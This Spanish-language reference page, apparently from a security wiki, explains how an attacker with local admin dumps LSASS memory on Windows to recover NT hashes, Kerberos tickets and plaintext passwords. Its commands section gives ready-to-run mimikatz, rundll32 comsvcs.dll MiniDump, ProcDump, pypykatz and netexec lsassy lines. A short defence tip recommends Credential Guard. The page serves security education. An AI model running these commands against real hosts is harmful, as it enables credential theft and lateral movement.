Credenciales

Extraer credenciales de LSASS

Cómo un atacante con administrador local lee la memoria de LSASS y recupera hashes NT, tickets Kerberos y contraseñas en texto plano.

Qué es

Extraer credenciales de LSASS lee la memoria del proceso LSASS de Windows. Recupera los hashes NT, los tickets Kerberos y, a veces, contraseñas en texto plano. Entrega las credenciales de cada cuenta que inició sesión en el host desde el último reinicio.

Cómo funciona

Windows guarda material de autenticación en LSASS para el inicio de sesión único. Así el sistema se autentica a recursos de red sin volver a pedir la contraseña. Leer esa memoria exige SeDebugPrivilege, que trae el administrador local o SYSTEM. El atacante lee LSASS en vivo, o vuelca el proceso a un archivo y lo analiza fuera de línea. El volcado fuera de línea evade parte de la detección del endpoint.

Diagrama

Comandos

Leer LSASS en vivo con mimikatz. Requiere administrador local:

privilege::debug
sekurlsa::logonpasswords

Volcar LSASS con una DLL propia de Windows, sin herramienta externa:

rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump <PID> <FILE> full

Volcar con ProcDump de Sysinternals:

procdump.exe -accepteula -ma lsass.exe <FILE>

Analizar el volcado fuera de línea con mimikatz:

sekurlsa::minidump <FILE>
sekurlsa::logonpasswords

En Linux, analizar el mismo volcado con pypykatz:

pypykatz lsa minidump <FILE>

Volcar LSASS en varios hosts a la vez con netexec:

nxc smb <IP> -u <USER> -p <PASSWORD> -M lsassy

Cómo defenderse

Activa Credential Guard: aísla el material de credenciales con seguridad basada en virtualización y las lecturas normales de LSASS ya no lo alcanzan.

Siguiente

Puedes seguir leyendo aquí:

CredencialesCoerción y relay a la inscripción web de AD CS (ESC8)

No te pierdas ninguna noticia

Recibe un correo cuando haya alguna actualización importante.

Al suscribirte aceptas la política de privacidad.